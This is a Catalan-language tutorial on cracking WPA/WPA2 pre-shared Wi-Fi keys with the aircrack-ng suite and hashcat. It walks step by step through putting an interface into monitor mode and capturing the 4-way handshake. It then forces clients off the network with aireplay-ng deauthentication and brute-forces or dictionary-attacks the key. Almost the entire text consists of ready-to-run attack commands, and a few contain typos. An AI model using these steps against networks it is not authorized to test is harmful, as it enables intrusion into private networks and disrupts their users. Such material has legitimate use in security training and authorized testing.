WPA/WPA2 amb preshared key

WPA/WPA2 i preshared key #

  • Es tracta d'una clau compartida
  • Mètodes
    • Força bruta, atac per diccionari

Passos #

  1. LListem totes les wifi i els seus paràmetres amb nmcli
nmcli -f ALL dev wifi

2.Primer hem de posar la interfície en mode monitor/promiscuo. 2.1 Mirem els drivers que tenim amb

airmon-ng

2.2 Deshabilitar processos que puguin interferir amb la captura (si no ho fas i n'hi ha t'avisa)

airmon-ng check kill

2.3 Arrancar el driver

airmon-ng start [interface] 9
  1. Cerquem la informació d'autenticació (4-way handshake)
airodump-ng -c [canal] --bssid [bsid] -w [nomPrefixFitcherCaptura] [interface]
  • quan a dalt a la dreta es vegi "[ WPA handshake: XX:XX..." és que el handshake s'ha capturat (Les XX:XX de l'exemple)
  • Si fas un ls veuras que s'hauran generat uns quants fitxers amb el nom que has posat abans i diferents extensions.
  • Si vols fer l'anàlisi amb wireshark de la caputra generada utilitza el filtre "eapol"
  1. Cas en que no hi ha clients que s'autentiquin

    • Si hi ha pocs usuaris es pot donar el cas que ningú s'autentiqui durant molt de temps. Una manera d'accelerar el procés seria forçar el logout d'un usuari per a que facin login de nou.
    • Per fere-ho es pot utilitzar l'eina aireplay-ng per a dir-li al client que ja no està associat i ell automàticament es tornarà a associar.
    aireplay-ng -0 1 -a [MAC AP] -c [MAC Client]  [interface]
    

    "-0" significa desautenticació 1 és el número de desautenticacions que vols enviar

    • Si vols estar segur que li ha arribat el paquet pots escoltar via tcpdump/wireshark i esperar una ACK

Cracking: via aircack [opció 1] #

aircrack-ng -w [wordlist] -b [BSID] [captura(s) ]

Cracking: patrons [opció 2] #

  • En el cas que sàpigues el patró de generació de la contrasenya pots posar com entrada d' aircrack la sortida de :

Hashcat #

hashcat --stdout -a 3 patro | aircrack-ng -w - -b [BSID] [captura(s) ]

crunch #

cruch [patrons] |  | aircrack-ng -w - -b [BSID] [captura(s) ]

Cracking: hashcat [opció 3] #

  • Convertir la captura .cap a .hccapx amb cap2hccapx
cap2hccapx.bin [captura].cap [noufitxer].hccapx
  • crack amb hashcat
hashcat -m 2500 -a3 [hccapx] -1 ?l?u -2 [patro] -w 3